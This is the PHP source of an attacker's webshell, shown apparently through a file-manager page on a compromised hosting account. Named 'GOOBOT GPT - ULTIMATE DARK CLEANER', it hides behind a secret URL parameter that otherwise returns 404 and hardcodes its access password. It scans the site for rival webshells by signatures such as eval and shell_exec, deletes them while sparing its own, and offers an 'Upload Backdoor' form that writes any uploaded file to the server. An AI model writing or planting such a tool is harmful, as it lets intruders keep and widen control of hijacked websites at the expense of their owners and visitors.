Peler

: / home2 / alldecor / public_html /
Filename : file.php
back
<?php
$password = "KasihKnow213";

if (!isset($_GET['p']) || $_GET['p'] !== "X9Yoo") {
    http_response_code(404);
    die();
}

echo '<style>
body{background:#000;color:#ff0000;font-family:Consolas;padding:20px;}
input,textarea,button{background:#1a0000;color:#ff3333;border:1px solid #8b0000;padding:10px;}
button{font-weight:bold;cursor:pointer;margin:5px;}
button:hover{background:#ff0000;color:#000;}
table{border-collapse:collapse;width:100%;} th,td{border:1px solid #8b0000;padding:8px;}
th{background:#8b0000;color:#fff;}
</style>';

echo "<pre style='color:#ff0000;background:#0a0000;padding:15px;'>
╔══════════════════════════════════════════════════════════════╗
║           GOOBOT GPT - ULTIMATE DARK CLEANER v666            ║
║         Akses: ?p=X9Yoo   |   Pass: KasihKnow213             ║
╚══════════════════════════════════════════════════════════════╝
</pre>";

$target_dir = isset($_POST['target_dir']) && !empty($_POST['target_dir']) ? $_POST['target_dir'] : ($_SERVER['DOCUMENT_ROOT'] ?: getcwd());

$our_shells = isset($_POST['our_shells']) ? array_filter(explode("n", str_replace("r", "", $_POST['our_shells']))) : ["clean.phl","file.php","goobot","g00b0t"];

function is_our_shell($file) {
    global $our_shells;
    $name = strtolower($file);
    $content = strtolower(@file_get_contents($file) ?: '');
    foreach ($our_shells as $s) {
        if (strpos($name, strtolower(trim($s))) !== false) return true;
    }
    if (strpos($content, 'goobot gpt') !== false || strpos($content, 'kasihknow213') !== false) return true;
    return false;
}

if (isset($_POST['delete_all']) && isset($_POST['all_shells'])) {
    echo "<b>[+] Menghapus SEMUA Shell...</b><br><br>";
    $count = 0;
    foreach ($_POST['all_shells'] as $f) {
        if (is_our_shell($f)) {
            echo "<span style='color:lime;'>[PROTECTED] $f</span><br>";
            continue;
        }
        if (@unlink($f)) {
            echo "<span style='color:red;'>[ERASED] $f</span><br>";
            $count++;
        }
    }
    echo "<b style='color:#ff0000;'>Total $count Shell dimusnahkan.</b><hr>";
}

echo '<form method="post">';
echo '<b>Target Directory:</b><br>';
echo '<input type="text" name="target_dir" value="'.htmlspecialchars($target_dir).'" size="100"><br><br>';
echo '<b>Nama Shell Kita:</b><br>';
echo '<textarea name="our_shells" rows="6" cols="90">'.htmlspecialchars(implode("n", $our_shells)).'</textarea><br><br>';
echo '<button type="submit" name="scan">SCAN WEBSHELL</button>';
echo '</form><hr>';

if (isset($_POST['scan'])) {
    echo "<b>[+] Scanning di: <span style='color:yellow;'>$target_dir</span></b><br><br>";
    $shells = [];

    function detect_shell($filepath) {
        $data = @file_get_contents($filepath);
        if (empty($data)) return false;
        $l = strtolower($data);

        $signs = ['eval(', 'base64_decode', 'shell_exec', 'system(', 'exec(', 'passthru', 'assert(', 'create_function', 'str_rot13', 'gzinflate', 'gzuncompress', '$_post', '$_get'];
        foreach ($signs as $s) {
            if (strpos($l, $s) !== false) return true;
        }
        if (strlen($data) < 1200 && strpos($l, '<?php') !== false) return true;
        return false;
    }

    function scan($dir) {
        global $shells;
        $items = @scandir($dir);
        if (!$items) return;
        foreach ($items as $item) {
            if ($item == '.' || $item == '..') continue;
            $path = $dir . '/' . $item;
            if (is_dir($path)) {
                scan($path);
            } elseif (preg_match('/.php$|.phtml$|.suspected$/i', $item)) {
                if (!is_our_shell($path) && detect_shell($path)) {
                    $shells[] = $path;
                }
            }
        }
    }

    scan($target_dir);

    if (empty($shells)) {
        echo "<b style='color:lime;'>Tidak ditemukan webshell.</b>";
    } else {
        echo '<form method="post">';
        echo '<input type="hidden" name="target_dir" value="'.htmlspecialchars($target_dir).'">';
        echo '<input type="hidden" name="our_shells" value="'.htmlspecialchars(implode("n", $our_shells)).'">';

        echo '<table><tr><th><input type="checkbox" onclick="toggleAll(this)"></th><th>Path Shell</th></tr>';
        foreach ($shells as $s) {
            echo "<tr><td><input type='checkbox' name='files_to_delete[]' value='".htmlspecialchars($s)."'></td><td>".htmlspecialchars($s)."</td></tr>";
        }
        echo '</table><br>';
        echo '<button type="submit" name="delete_selected">HAPUS YANG DICENTANG</button> ';
        echo '<button type="submit" name="delete_all" style="background:#8b0000;">HAPUS SEMUA SHELL</button>';
        foreach ($shells as $s) {
            echo '<input type="hidden" name="all_shells[]" value="'.htmlspecialchars($s).'">';
        }
        echo '</form>';
    }
}

echo '<hr><form method="post" enctype="multipart/form-data">';
echo '<b>Upload Backdoor:</b><br><input type="file" name="upload_file"><br><br>';
echo '<button type="submit" name="upload">UPLOAD</button>';
echo '</form>';

if (isset($_POST['upload']) && isset($_FILES['upload_file']['tmp_name'])) {
    $name = basename($_FILES['upload_file']['name']);
    if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $name)) {
        echo "<b style='color:lime;'>Upload Berhasil: $name</b>";
    } else {
        echo "<b style='color:red;'>Upload Gagal</b>";
    }
}
?>

<script>
function toggleAll(src) {
  document.querySelectorAll('input[name="files_to_delete[]"]').forEach(cb => cb.checked = src.checked);
}
</script>